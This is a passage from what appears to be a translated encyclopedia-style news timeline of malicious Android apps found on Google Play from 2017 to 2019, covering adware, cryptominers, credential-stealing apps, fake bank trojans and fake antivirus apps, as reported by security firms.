Check Point researchers believe that the developers were not aware of the malicious content of the RXDrioder SDK, since, according to the study, the campaign was not country-specific and was developed by another developer.

As of March 2019, SimBad acts as an advertising malicious application, opening advertising pages, but has great functionality capable of a greater threat.

Every fifth VPN application is a potential source of malware

On January 22, 2019, it became known that the most popular free VPN applications Google in the Play Store contain problems that can threaten safety users. According to a study conducted by Metric Labs specialist Simon Migliano, one in five applications is a potential source of malware, and ON a quarter of the analyzed programs contain vulnerabilities related to leaks DNS user requests.

The specialist studied 150 VPN applications, the total number of downloads of which amounted to approximately 260 million times. Of the services studied, about 85% had intrusive permissions, as well as functions that put user privacy at risk.

In particular, 57% of applications contained code to collect data on the user's last known location, 38% of applications requested access to device status information, 25% of applications tracked users' location, and some programs requested permission to use the device's camera and microphone or could secretly send SMS^[11].

2018

Applications with viruses have been downloaded hundreds of thousands of times on Google Play

In March 2018, it became known about the presence of the virus in popular Android applications posted in the Google Play catalog. The malicious code was discovered by specialists from SophosLab (specializing in information security technology), who shared the find on their blog.

The malware, which SophosLab identified as Andr/HiddnAd-AJ, was hidden in programs for reading QR codes (among them - QR Code Free Scan, QR Code/Barcode and QR & Barcode Scanning) and the Smart compass application located in the Google Play store. The virus was used by its distributors to display advertisements on the screen of mobile devices and advertising links, allowing scammers to wind up advertising clicks, even when the infected application itself is inactive.

In March 2018, it became known about the presence of the virus in popular Android applications posted in the Google Play catalog

When first launched, the infected application sends a request to the attacker's server to get the required configuration. Then the virus gets access to a list of links, messages and icons that soon begin to clutter the victim's smartphone. Interestingly, a small graphic component is attached to the hacker program through which you can control its work.

It is noted that applications infected with Andr/HiddnAd-AJ have downloaded more than 500 thousand times on Google Play. Hackers took a number of measures to mask the virus: firstly, the infected part of the software pretended to be a standard Android programming library, which was also built into applications, and secondly, the malicious element was activated a few hours after the victims downloaded the software from Google Play.

SophosLab notified Google of the danger, and the Internet company removed all infected applications from the store. To protect themselves from such infections, experts recommend that owners of Android devices use antiviruses.^[12]

Detecting malicious cryptomainers

Avast specialists on March 16, 2018 reported the discovery of two SP Browser and Mr. MineRusher applications on Google Play with built-in malware for mining Monero cryptocurrency. Apps have already been downloaded by thousands of users.

In November 2017, Avast discovered a JSMiner malware stamp on Google Play - the cryptominer was hiding inside the Cooee game app.

The mobile mining process begins according to a similar scheme, when the user downloads the application and opens it. Then there is an automatic connection to the apptrackers.org website, where CoinHive Java Script is hosted for Monero mining. As soon as the connection to the domain is made, mining begins. The whole process goes unnoticed by the user - in the background, when the screen is off and the device is using data transfer or connected to Wi-Fi.

Avast specialists conducted an experiment on Monero mining using mobile phones. Participants witnessed rapid battery discharges, broken websites and, in some cases, full-scale disruptions.

The emergence of malicious cryptocurrency applications

In the Apple App Store, Google Play and other online stores, you can easily find malicious cryptocurrency applications with which hackers steal money and personal data of people. This is evidenced by the data of the information security company RiskIQ, published on January 24, 2018. Read more here.

2017

More than 80 malware stealing Vkontakte user data removed from Google Play

Kaspersky Lab experts in just two months found 85 malicious applications on Google Play that steal user data to log into the VKontakte social network. The most popular of these was installed more than a million times, with another seven having 10,000 to 100,000 installations.

Applications stole data for access only on devices with certain languages ​ ​ - Russian, Belarusian, Ukrainian, Kazakh, Armenian, Azerbaijani, Kyrgyz, Romanian, Tajik and Uzbek. This is natural, given that the VKontakte social network is really popular only in the space of the former USSR.

In all likelihood, the criminals used the stolen data primarily to promote VKontakte groups.

Some of the attacked users complained that they were subscribed to certain pages without their own knowledge, the publication of Kaspersky Lab says. - Information about attempts to use this data for more explicit fraudulent actions has not yet been reported.

Most of the malicious apps were uploaded to Google Play in July and activated in October 2017. Mostly they imitated all sorts of additions to the main functionality of the social network - for example, to listen to music or track guests on a profile page on a social network. Naturally, these applications required entering a login and password for VK.com.

However, the most popular - with more than a million downloads - the application turned out to be a mobile game published on Google Play back in March. Initially, there was no malicious component in it - it appeared only in October after another update. That is, cybercriminals waited about seven months until the game gained enough popularity to ensure the maximum spread of the malicious component.

After the Laboratory notified the administrators of the social network and Google about the threat, all applications containing malicious code were removed from Google Play.^[13]

How to distinguish malicious applications

Unfortunately, despite all Google's efforts, malicious applications continue to penetrate Google Play, - said Roman Ginyatullin, an information security expert at SEC Consult Services. - An example with a mobile game that acquired a malicious "stuffing" far from immediately, very eloquent: the application can be initially harmless, and then overnight begins to pose a massive threat.

As for protection, as Ginyatullin noted, users should check who is the developer of the application, even if it is published in the official Google store. In addition, if an "unofficial" application requires entering a login and password from a social network, this is a clear sign of bad intentions.

Technical details about these applications are available on the website securelist.ru.^[14]

Google Play booms Trojans masquerading as mobile bank apps

Group-IB at the end of November 2017 noted a wave of mass distribution of Trojans masquerading as mobile applications of the country's leading banks. Group-IB specialists block the resources from which these applications are distributed, but their volume is constantly growing.

Trojans designed for mobile devices under control OS Android are distributed not through the official store, but Google Play through advertisements in search engines. At the same time, Group-IB experts noted the high quality of fake programs, which confuses many users who do not pay attention to suspicious "little things." More. here

Authors of fake antiviruses cash in on WannaCry-related fears

In June 2017, researchers from RiskIQ discovered hundreds of mobile applications posing as means of protection against the WannaCry ransomware, in fact, turning out to be useless at best, and malicious at worst. Such applications are part of a larger problem - fake mobile antiviruses.^[15]

Using a simple search on the Web, experts found more than six thousand mobile applications, designated either as antiviruses, or as sources of information about antiviruses, or as auxiliary tools that complement antivirus solutions. More than four thousand of these applications are active by mid-June 2017, while 525 of them are blacklisted by the VirusTotal service, which collects information from real antivirus solution providers.

Researchers from RiskIQ have discovered hundreds of mobile applications posing as means of protection against the WannaCry ransomware, in fact, turning out to be useless at best

This does not mean that all these applications are malicious, the researchers note, adding that truly dangerous dangerous programs may not be blacklisted - at least for some time.

RiskIQ specialists found 508 active applications in the Google Play Store, designated as antiviruses, while about 55 of them were blacklisted by VirusTotal. In total, 189 different mobile app stores (not only the Google Play Store) were examined. At the same time, 20% of applications from the VirusTotal lists are in the official Google store; 10.8% of them are still active today, despite the fact that store administrators regularly eliminate dubious and openly malicious programs.

For example, a fake antivirus Antivirus Malware Trojan that appeared on Google Play was downloaded 10 thousand times before it was removed.

In another store - Mobiles24 - gullible users were offered Android's Antivirus, which actually contained five different versions of malware. The program was downloaded 3.5 thousand times.

Among the applications allegedly protecting against WannaCry, there were no frankly malicious ones, but they also do not give anything useful: the WannaCry ransomware does not attack mobile platforms (at least not yet), so statements about "protection" are nothing more than unscrupulous advertising. The authors of these applications exploit insufficient user awareness, as well as the hysteria associated with the recent epidemic.

As RiskIQ experts note in their publication, there is still a possibility that someone wants to equip the supposedly WannaCry-protecting applications with a malicious component.^[16]

Spammers and virus writers traditionally use high-profile information reasons for their benefit, "says Ksenia Shilak, Sales Director of Sec-Consult. - So here: a lot of users have "heard something" about the WannaCry epidemic, but have shown much less interest in details - who can become a victim, which platforms are vulnerable and how to protect themselves. Lack of awareness can pose an even greater threat than vulnerabilities in software.

More than a hundred malicious apps found on Google Play

In March 2017, researchers from Palo Alto Networks identified 132 Android apps containing malicious components in the Google Play store. The Google Play administration promptly responded to the message and removed the unsafe software.

According to Palo Alto Networks, the identified applications used the Android WebView component, which allows you to display images and text as static HTML pages. These pages, as it turned out, contained hidden IFrames with links to malicious domains.

Google Play Store

According to the researchers, one of these infected pages tried to download and install the malware, but the download procedure and the malware itself are able to function only in the Windows environment, without causing any harm to the smartphone itself.

The malicious domains mentioned have long been inactive: control over them was intercepted by the Polish Computer Incident Response Center (CERT) back in 2013.

Apparently, the developers of these mobile applications themselves became victims of intruders. This is indicated by the use of long-deactivated malicious domains, and malware under Windows, and some similarity in the code structure, indicating the ability to generate applications using the same platform.

Palo Alto Networks experts suggest that application developers may have used the same integrated development environment (IDE) that was already infected with malware ON or used an online application generation platform into which malicious code was previously integrated. He, in turn, integrated IFrame with links to dangerous domains into HTML application components.

The administration of Google Play has removed all these applications, although they themselves did not pose a threat.^[17]

Notes